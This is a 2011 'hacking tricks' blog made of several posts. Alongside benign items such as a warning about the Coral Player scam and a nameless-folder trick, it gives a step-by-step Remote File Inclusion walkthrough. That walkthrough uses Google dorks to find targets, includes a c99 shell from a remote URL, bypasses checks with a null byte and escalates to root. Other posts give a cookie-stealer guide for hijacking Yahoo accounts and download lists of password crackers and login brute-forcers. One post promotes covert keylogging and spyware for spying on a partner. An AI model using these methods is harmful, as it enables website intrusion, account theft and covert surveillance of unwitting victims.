Wednesday, October 5, 2011

What is coral player? Why it ask to download it to play movies downloaded from Internet?


Have you ever encountered to a situation when a movie you have just downloaded from Internet; asks you to download a specific player called Coral Player? Recently; this is very common on many torrent sites as almost 70% of movies downloaded just give this message as
Can not be played back in this movie player It only works in Coral player. Fell free to download from blah blah
Now have you ever considered this very simple question… Is the file format .avi can be so application savvy that can be only played back in a specific player… no it shouldn’t be as so…. so what is this coral player?
Though I don’t know whether any such player exists or not; it looks more like a spam site when I visited to their site… it first asks to pay $.95 for a three day trial… surprising… pay for try out and after the three day trial it will charge $19.95 every month just to play only media files… and the player itself also not very eye catching as in the demo shown. Apparently our ordinary player can play the part that says we need CoralPlayer to play the video. What this means is that the makers of CoralPlayer have invented a market for their software. A small portion of the file will play with any player. The rest of the file is presumably in a proprietary format which they created for the sole purpose of distributing videos which you then have to pay them monthly to view. Complete scam, total waste of money. However you can also it like that the actual scam is movie itself showing you to go to such site.
So be aware friends any player that requires you to buy is a fake or making money off you so they get richer or were they can infect your player.
Now the question arises what this movie is showing the actual size of  700 mbs or more and taken almost 6 to 7 hours to download… now can you tell me ‘Is it so difficult to create a movie which would last last in only one minute… I don;t tink so… this is what the movie file you have just downloaded.’
So there would be only suggestion that before you go for a download from a torrent site first of all check for the comments; there may be something you should know and make a habit of your own to comment on such spam torrent links; which might help others from wasting their time.
Though; the best think would be go for a download from the trusted network like Demonoid… who are very strict about such spams and continuously check for the torrent files.

Trick to Generate fake Facebook Comments or set your Fake Facebook Status


Facebook is one of the most loved Social Networking Site and there are so many ways have already in the process to have fun with friends via facebook.
Now today in this post you will learn another way on how to make fun fooling your friends with fake facebook comments or status.  To do such a fun Fake Convos is a Web service which is infact an interesting webware which generates Fake conversation on Facebookwith same design and interface as real as Facebook.
To begin with you only need enter the name on the left side of the screen, thereafter you can set the image which you can direct call from your facebook account if allowed to do so or using the image URL. And Finally enter with the message which you want to share. That’s all. In this way, any number of comments can be added with different profile names and Photos.
There are other similar services like FacebookQuotes which claim to does same thing but the results doesn’t look no real with Blurred Display Picture and unreal background design.

14. Myspace Hack: How to Hack Myspace Account Passwords


Have you ever seen your friend post a bulletin on MySpace about how they made a $1,000 on the weekend? It’s the first sign your friend’s MySpace account has been hacked. Maybe you’ve had your MySpace account hacked and would like to know what you can do to prevent it from happening again in the future. Then this post is for you.
Phishing: Most people have their account hacked by clicking on a stranger’s profile only to be taken to what looks like the MySpace login screen. Turns out it’s not a MySpace login screen and the username and password you just entered is saved for future use by the bad guys(hackers). The biggest thing is if you find yourself suddenly sent to the login page when you haven’t signed out, look at the url and make sure it says myspace.com in the address bar. If it has happened to you, you should be able to remedy the problem by simply changing your password watching for the proper web address in the future.
For more on Phishing and the method used for hacking Myspace account by Phishing refer:
Hack email accounts by Phishing.
Viruses: Another way people have their account hacked is from malware installed on their system that records their keystrokes. This is an uncommon problem for MySpace accounts because people looking to watch your keystrokes wouldn’t risk the legal trouble for MySpace accounts. They’d much rather take your bank account or something more valuable. If you change your password repeated times and you keep getting hacked, then you may have a virus and you’ll need to reinstall your operating system and start over.
Spy Software: Keylogging is the best and most guaranteed way to obtain a myspace password because not only can their myspace password, but you can get the passwords to everything they have and see every piece of information entered on the computer. Keylogging refers to the monitoring of key’s pressed on a keyboard, but most spy software contain many more usefull features. Some software does not even require you to touch the person’s computer, which many people find extremely usefull. I have tried many many different software solutions, and here is what I recommend.
If you have physical access to their computer, this should be relatively easy. For this situation, we recommend a keylogging software such as Ardamax keylogger . You can simply install it on the computer that they use and it will log all activity on the computer, including capturing the MySpace password. I recommend Ardamax keylogger because it has a unique MySpace capture feature that saves a screenshot of every page visited on the site and also has a great interface.
If there’s no way you can physically access their computer, it can be a little trickier to pull off. The program i’ve found that works the best (and gets so close to this ethical line) is a service called SniperSpy. SniperSpy gives you a module that you can send to your target that will allow you to spy on their computer’s every action. No physical access to the target’s computer is needed. You can view their computer screen LIVE from anywhere at anytime via your web browser, which means you don’t need to install anything on your computer either. You will be able to look at chat conversations, web sites visited, and gain access to all the online accounts they log into while being SniperSpyed. It even takes image screenshots of every internet webpage they look at, so that if they are perhaps deleting messages from their email/myspace inbox, you can look at the stored screenshots and read the deleted messages when normally you never could! This is the tool I used to catch my girlfriend and it worked absolutely great. I really believe it’s the ultimate spying tool (and i’ve tryed a lot of things). Their Testimonials page shows that they’ve been on the news and featured in several magazines, so you should feel pretty good that you’ll accomplish what you’re after when you buy it.
I’ve gotten word of a secret coupon code for 25% off SniperSpy and/or Acespy! That’s at least $20 off! Too bad I didn’t know about it when I bought SniperSpy, haha. At the second purchase page, enter the following code: RXS-SPY25
Ask them for it
Yeah, that wasn’t what you wanted to hear. Well, the truth is, an honest partner will let you have it if there is absolutely nothing going on. The reason you should ask is they might be forthcoming. If your partner refuses, it does not necessarily mean they are cheating, but it is a red flag and can indicate they are hiding something
Other
People can also think their account was hacked if they neglect to log out and someone uses the computer after them. So be sure to logout and not just close the window, especially if you’re at a library, internet cafe, or the like.
So guys, i have provided you with almost all methods used for hacking Myspace accounts passwords. If you have any query about hacking myspace account passwords, please let me know.
Enjoy HaCkInG….

How to create Name Less Folders: Windows Simple Hack Trick.


Though creating a single file or folder with no name is not a very tough task as many of us already aware of this… just use spacebar instead of any other key and save a file or folder it will be created.
But the real surprised will be if someone is able to create another file or folder at the same location as the earlier one as we all know no two files or folders with the same name can be exists at the same location, even typing spacebar twice or thrice would not solve the issue.
Now are you looking for a trick here? Yes! There can be so many folders or files as wish just follow the simple steps given below:
1) Select file, Press ‘F2′.
2) Hold ‘Alt’ key and type ’0160′ from the numpad.
3) Release the ‘Alt’ key. Now without doing anything else, again hold ‘Alt’ key and type ’0160′.
4) Press ‘Enter’ and you will have second nameless file in the same directory.
5) Repeat step 3 to create as many nameless files or folders in the same directory.
Though it looks that the name less folders easily created with the trick, but to deal while deleting them is more tricky… use either Unlocker or  start your computer in ‘Safe Mode’ and delete it from there.

12. Software Collection to Password Decrypters: Crack Passwords from any file


Have you ever came across any application zipped which you want badly but the sad situation is that it is password protected and in no way you can able to crack it. Then in  such a situation most of us favor to just left out that version and start searching for any alternative application. But do you know there are still some application which can recover passwords from such files easily and are easily accessible via Rapidshare. Few days back I have came across a bundle of such tools called password decrypters… have a look at them.
The list includes:
-Access Driver
-Brutus-AEt2
-Cain and Abel 4.2
-FileZilla PWDump 0.1
-ForceSQL
-John The Ripper 1.7.1 Win
-KMd5 1.03b
-LC3
-MailForce2.4
-MD5 (Linux)
-MD5 Backup (Linux)
-MD5 GUI
-MD5 Toolbox 1.0
-MD5brute 1.0
-Passware 5.0 + Serial
-POP3 BruteForcer
-Sam Decrypt
-Unsecurev1.2
-VNCrack (Linux) 1.21
-VNCrack (Win32) 1.21
These are some of the widely used tool from very past and are most described so if you are also interested to have them in your application arsenal then go through the link below to download the total collection.
Download here

11. How to do MAC Cloning or NIC switching to Bypass Rapidshare Time Restriction and Download Limit


Though here are so many Rapidshare tricks we already have, but still hunger for the always new tips or tricks seems at not end. So now in the series there are two new latest tip here have been posted to how can be the bypass the Time Restriction or Download Limit. These are some how said to be the most advanced and may require additional software or hardware.
First Method we will use here MAC cloning application, which will allow you to change your MAC address of your NIC.
First of all Install MAC cloaning app (search Google from appz) Different appz have different procedures, read the help file to figure out what you are doing. I use SMAC, it is pretty simple.
1. Download file from RapidShare.
2. Change MAC address (don’t change until the current file is finished downloading)
3. Restart Modem, ISP will issue a new IP for new MAC address. Takes less then 15 seconds.
4. Download another file from RapidShare
This was all what we have to do with MAC Cloning now the second trick is having two NICs and a hub as I have static IPs (Roadrunner).
1. Download a file from RapidShare.
2. Disable one nic and activate another after download is complete.
While NIC is activating restart Modem. IPS will assign a new IP.
3. Download another file.
4. When download is complete, create a bridge between NICs while restarting modem. Your ISP will assign a new IP.
This will get you three files in time limit set by RapidShare.
This method is not that high speed but is better then one file an hour.
Second method uses MAC cloaning application.
It will allow you to change your MAC address of your NIC.
Though I know these methods are not much easier as were the previous one but are worth to be tried if you have the hardware.

10. MSN Messenger hacks/tricks : Send continuous MSN nudges


Here I have already written several articles about Orkut and Myspace Tricks  but today you will know a very special MSN Messenger trick to send continuous MSN nudges to your friend online. This msn messenger trick will send number of continuous nudges. For this msn messenger trick to work, you should have msn messenger plus installed. If you don’t have msn messenger plus installed, download msn messenger plus.
What make me this to write this article as I had many times experienced continuous nudges while on online msn messenger with my friend. You get continuous msn nudges and hardly can do anything on msn messenger while being nudged. When tried to do the same in return, you get message ” You may not send a nudge that often”. Then i searched net for this msn messenger hack/trick and now informing you about this msn messenger nudge trick.
The steps are as below:
1. Download and install NudgeToolsScript (double clicking the .plsc file)
2. You will get warning message. Just check “I accept responsibility of installing this script” and click import.
3. Now, in msn messenger type “/sendnudge 1000 100″ (without quotes) and hit enter. This will make 1000 nudges every 100 milliseconds for friend. To stop nudges type “/stopnudge”.
4. While sending nudges, even your msn messenger window will be nudged. To avoid this, go to Tools > Option > Messages and uncheck the “Allow me to send and receive nudges”.
That’s it. Now, i hope you can send nudges to your friend online on web msn messenger. This msn messenger hack/trick will help you in nudging your online friend on msn messenger.

9. Hack Rapidshare to Beat Time Restriction and Download Limit… best trick


As it is a well known fact Rapidshare is world’s biggest file storage/sharing network and one of the most trafficked websites on the web. But the most irritating factor with the Rapidshare is the time restriction and time limit, this is why most of us looking for a backdoor to just bypass these files restrictions. Though in my previous post also I have mentioned the possible collection of tools and tips and premium link generators etc.. now in this post I am posting some of the hinds to help you more efficiently use Rapidshare. Skipping waiting time and bypassing download limits are Rapidshare hacks that everybody should know. These tips have been retested and continue to work well today, that is May 2011.
Do you know how Rapidshare keep tracking of the who is accessing and how much data has been transferred from their server…. by the IP address of any particular PC. This is how Rapidshare traces the users IP address to limit each user to a certain amount of downloading per day. To get around this, you need to show the Rapidshare server a different IP address.
Now here are some method better to say well known tested methods to bypass these restrictions
1. Short-Out the JavaScript:
    1. Goto the page you want to download
    2. Select FREE button
    3. In the address bar put the following: javascript:alert(c=0)
    4. Click OK
    5. Click OK to the pop-up box
    6. Enter the captcha
    7. Download Your File
2. Request a new IP address from your ISP server.
    Here’s how to do it in windows:
    1. Click Start
    2. Click run
    3. In the run box type cmd.exe and click OK
    4. When the command prompt opens type the following. ENTER after each new line.
    ipconfig /flushdns
    ipconfig /release
    ipconfig /renew
    exit
    5. Erase your cookies in whatever browser you are using.
    6. Try the rapidshare download again. 
    Frequently you will be assigned a new IP address when this happens. Sometime you will, sometimes you will not. If you are on a fixed IP address, this method will not work. To be honest, I do not know how to do this in linux/unix/etc. If this works for you, you may want to save the above commands into a batch file, and just run it when you need it.
3. Use a proxy with SwitchProxy and Firefox:
4. Use an anonymous service:
    Running your system through the tor network should in theory work; however, it is difficult to use and setup. Plus, you allow others to run their evil deeds through your system as well by using this system. Anonymizer 2005 is inexpensive, easy to use, but not free. Other pay services would likely work as well.
5. You can use a bookmarklet to stop your wait times:
    1. Open IE
    2. Right Click On This Link
    3. Select Add to Favorites
    4. Select Yes to the warning that the bookmark may be unsafe.
    5. Name it “RapidShare No Wait”
    6. Click on the Links folder (if you want to display it in your IE toolbar)
    7. Click OK
    8. You may need to close and reopen IE to see it
    9. Goto rapidshare and click the bookmarklet when you are forced to wait
This is all for now if it look s that I have missed something then why not just let me know… plz do post your valuable tricks or comments… it will benefit both the blog and blog readers..

8. List of most used tool to Hack Login Accounts from several Websites


The word Hacking has gone in such a mad way that everyone would like to try out their hands on how the most of the hackers claims to have hacked any website or login accounts. But most of them fails to do the same as they don’t have the right software. Today in this post i have found several software which hackers were using from a very long time and fortunately all of them are from Rapidshare. If you wanted to try them out any one of them just go through the link provided and use them at your own risk this blog will not be held responsible in any ways.
————————————————————————————–
AccessDiver_4.402
http://rapidshare.com/files/73578278/ad4…r.rar.html
Logins: pop-up
Basic tool. check http://accessdiver.com/ for updates and info!
————————————————————————————–
CForce
http://rapidshare.com/files/73575691/CFV1.01b.zip.html
Logins: pop-up, Form, Strongbox
A very simple and useful tool. Many start with this one.
————————————————————————————–
Sentry_1.4
http://rapidshare.com/files/73574138/sentry1.4.rar.html
Logins: Mainly pop-up
A very good tool
————————————————————————————–
HTTPBugger_v2.2
http://rapidshare.com/files/73577305/Htt…2.rar.html
Logins: Form/OCR
A tool for advanced people. even sites like pixandvideo or
peternorth are crackable with this little tool.
————————————————————————————–
Charon_0.6
http://rapidshare.com/files/73578915/Cha…6.rar.html
Proxy-checker!
[HIGHLIGHT="red"]Anonymity is most important.[/highlight]
Check your proxies with charon! Highly recommended.
————————————————————————————–
STAPH_1.25
http://rapidshare.com/files/73580097/StA…p.rar.html
Combo-leecher
Leech combos for themed combolists with STAPH!
————————————————————————————–
Raptor_3
http://rapidshare.com/files/73579738/Raptor.rar.html
Wordlister!
Build your own wordlists with Raptor!
—————————————————————————————-

So just go through with this whole list and enjoy whatever you wanted to do

7. What is Remote File Inclusion (RFI)? How it used to hack Websites?


These days hacking terminology has gone such a mad subject that every one wants to get one or more tricks to penetrate into personal accounts whether it is EMAIL accounts, personal social networking accounts on facebook or orkut or the website passwords. Though ethical hacking is not a bad idea; but until it not harms some one privacy. Few days back I got a mail from one of my friend asking is there any way we can remotely get the admin rights of any websites? I googled a lot and finally came to a conclusion that the sites using old php version below ver 6.00 can be hacked via Remote file Inclusion…. and too my surprise I have also found that more than 90% websites are vulnerable to such attack. Now……..get the idea in detail…..
First of all let you know What is Remote File Inclusion?
Remote File Inclusion is way of inserting a file called SHELL (This is a graphical user interface responsible to give you the rights to browsing the remote files and running you own code on the web servers) via remote access to get the admins rights…. hence this is why the most popular method of hacking websites. The shell file if included well in the server then allow the hackers to execute the server side commands as if the user logged over the servers; along with access to all the servers files. We also today in this article are going to learn the same technique to use local exploits to escalate our privileges and get control over the whole server…. but keep in mind that this is only for tutorial purpose neither I nor the site will have any responsibility what you do at your own end.
The Vulnerability in PHP below ver. 6……
Now let process to next step… as we have already learned the php based websites can easily hacked via Remote file Inclusion but what’s the way…. and what are the basic vulnerabilities that targets the websites hack…..
Many of the web servers are vulnerable to this type of attack because of PHP’s default settings ofregister_globals and allow_url_fopen being enabled. Though in the latest release register_globals has been removed (This is why the continous notificaltion we get to update our scripts and applications)  but sadly it still have the second vulnerability remains open, so we can give it a try to latest version PHP websites too.
But a good news for hackers is that around 90% websites on the internet still uses old versions of PHP and another good news in those 90% websites, more than 60% websites has default settings enabled. That means we can hack most of the websites and deface them. Isn’t that cool, but as i have said we are ethical hackers we only find vulnerabilities in the websites .
So now let’s begin with the steps of Website Hacking….
Step 1: First of all you need to search for the websites that can be hacked i.e. having PHP script vulnerability. The best technique is to find websites using Google Dorks. Google dorks are simply the queries that are used to identify the specific search results. You can download the list of Dorks from the link here
Step 2: Identifying Vulnerable website that have the page navigation system similar to below mentioned:
http://target-site.com/index.php?page=PageName
Step 3: Once you have found the websites that seems the page navigation system looks like the above no check if a the website is vulnerable to remote file inclusion attack, we would try to include a website link  instead of PageName as shown below:
http://target-site.com/index.php?page=http://google.com
Now if the Google Home Page opens, then its confirmed that website is vulnerable to Remote File Inclusion attack and we will continue our attack. If Google homepage doesn’t opens, we will try another website.
Step 4: Now you hot the link of the website that can be hacked, so now its time to include the shells into the website. There are number of shells available online but my favorite are C99 and r57 because of their extended functionality and features. Though you always don’t need to download these shells on your systems or PC, as you can directly use the online resources for doing that but if you wish you can download them from their respective websites. On this site I have not provide these because its unethical but you can easily Google it … To find the a shell the hacker would search Google for:
inurl:c99.txt
This will display many websites with the shell already up and ready to be included.
Note: you must include a ? after the URL of Shell  so that if anything comes after c99.txt, it will be passed to the shell and not cause any problems.
For future use of Analysis you can download these shells from here:
http://www.localroot.net/
The new URL with the shell included would look like:
http://target-site.com/index.php?page=http://site.com/c99.txt?
Step 5: Sometimes the PHP script on the server appends “.php” to the end of every included file. So if you included the shell, it would end up looking like “c99.txt.php” and not work. To get around this, you would add a null byte () to the end of c99.txt. This tells the server to ignore everything after c99.txt.
Step 6:  Vulnerabilities Database
In step one, I told you that hackers use Google dorks to look for sites possibly vulnerable to RFIs. An example of a Google dork would be:
allinurl:.php?page=
This looks for URL’s with .php?page= in them. This is only an example and you most likely won’t find any vulnerable sites with that search. You can try switching around the word “page” with other letters and similar
words.
Hackers usually search vulnerability databases like www.milw0rm.com for already discovered RFI vulnerabilities in site content management systems and search for websites that are running that vulnerable web application with a Google dork.
Step 6: So now If you succeeds in getting the server to parse the shell, then we will be see a screen similar to the following:

hacking websites using remote file inclusion, learn how to hack websites
Hacking Website using Shell RFI attack
The shell will display information about the remote server and list all the files and directories on it. From here we would find a directory that has read and write privileges and upload the shell but this time as a .php file so that incase the vulnerability is fixed, he will be able to access it later on.
Step7: Find Root Privileges on Server
Now we would next find a way to gain root privileges on the system. We can do this by uploading and running local exploits against the server. you can find list of such exploits on milw0rm. We could also search the victim server for configuration files. These files most of the times contain username and passwords for the MYSQL databases and such.
That’s all the way to hack websites using the remote file inclusion method. I hope you all have liked it.
Now the most asked question How to Protect your Websites and Forums from Remote file inclusion attack?
To protect yourself from RFI attacks, the best way is simply make sure you are using up-to-date scripts, and make sure you server php.ini file has register_globals and allow_url_fopen disabled.

6. What are session cookies? How they used to hack email accounts?

Once again welcome back a very interesting article about Session Cookies, which many hackers claiming to have used to hack email accounts or password of several other websites. In this tutorial you will learn how to hack yahoo account using session cookies.
Before we start any further let all you know what these session cookies are… sometimes which called Magic Cookie or Session ID?
However, if we try go in deep, there can be written whole article about these session id’s but in simple ways… these are the string stored when we tends to login our account. But with unfortunate with hackers luck these strings have very short span of life i.e. gets automatically deleted after a set period of time. Now the question where these strings are stored -  In any situation there are only two places where these keys gets stored first one is itself the server and the second one is the browser cookies. And the destruction takes place at three ways first is when you close your web browser, second is when you sign out of your account and third is if you left your account open for more than 20 minutes idle.
How this Cookies accessed on Local System?
As in this article we are using Yahoo account, so to get understand what this cookie is first you need to open yahoo.com and login to your account. After that you have login to yo ur account copy the below code written in bold and then paste in browser address bar.
javascript:alert(document.cookie);
This will open a popup box with a text something like this which is just not able to understand but we even not need to do so.. as only we need this code only.

How to hack email account using session cookies
Now create one fake account on yahoo.com and login in that account and retrieve the cookie in same manner and notice the changes in session ID’s.
Now come to the main point hacking using the session ids…. For hacking the session cookies we first need the session cookies of the victim and its quite simple to get the session cookies of the victim. You just need to send him one link as soon as he clicks on that we will get his session cookie.
Here you should note this point as we have already mentioned that session hacking removes the authentication on the server as we have the AUTO LOGIN cookie. In this type of attack when victim sign out , then hacker will also sign out. But in case of YAHOO its little bit different, when victim signout but attacker still have the access to his account. Yahoo maintains the session for 24 hours and then destroy the session ID’s from its server.
Now how to step further to steal Session Cookies … follow the steps behind…
1. Go to the Website and register there:
2. Download the Cookie stealer files:
3. Now upload the four files on the website and create one empty directory naming Cookies as shown below:
4. Send the link of yahoo.php to victim. Now what will happen when user clicks on the yahoo.php is that its cookies are get stored into directory Cookies and simultaneously he is redirected to his account.
5. Now open the link Hacked.PHP to access the cookies. In my files the password is “password”. You need to put that to access the files.
6. You must have got the username of victim’s account. Simply Click on it and it would take you to inbox of victim’s yahoo account without asking for any password.
Now it doesn’t matter if victim signs out from his account, you would remain logged into it. 
Note: You can try this attack by using two browsers. Sign into yahoo account in one browser and run the code. Then sign in through other browser using stolen session.

5. Is E-mail Hacking Really Possible… look out into facts


Friends, Although all of us have an email account and does whatever possible to secure our online data from being hacked like having a complex password, or applying firewall or any other method possible. But this is also a fact some of us always looks for the way how can an e-mail be hacked. So let me clear one thing that comes first …. can an email be hacked… then its unfortunate.. but the answer is yes… but there is also a relief in a way that there is not any readymade software that can makes email hacking possible and if there is any site or software that claims it is simply a fraud. Then how can an email id be hacked the only way unless the owner of the Email ID allows it.. Let’s see how?
The email hacking can be done only through the keylogger method in which a hacker silently installs the codes to record the keystrokes we use to put over in the password area and then by sending them to the hacker and for such a trick a simple software Sniperspy is used, which is enough easy to use so that anyone with a basic knowledge of computers can use it. So now you can easily relax if you never intended to open faux emails with attachments for which you are unsure whether it is safe or not or not from origin you trust and in any case when you have doubts or any email popups the massages to install missing plugins or says some necessary files missing and it needs to updated your registry then simply avoid such mails and delete them as viewing a simple email does not requires special plugins or codecs and if any such codecs needed they are bundled with your operating software and have been automatically installed… no matter which operating software you are using.  And as for the curious nature of human being if any one of you would like to know more about such a software then you can use the below link to download the software to end your curiosity… but with the humble request to not use it to hack anyone’s personal or professional (whatever it is) life… but you should enjoy it make some one “BAKRA” HAHAHAHAHHAHHAHA……
And to know how it works wait for my next article in which you will find about working of this amazing hacking tool and if any one of you knows about any other software or working then plz write about in the comments section i will really appreciate your efforts.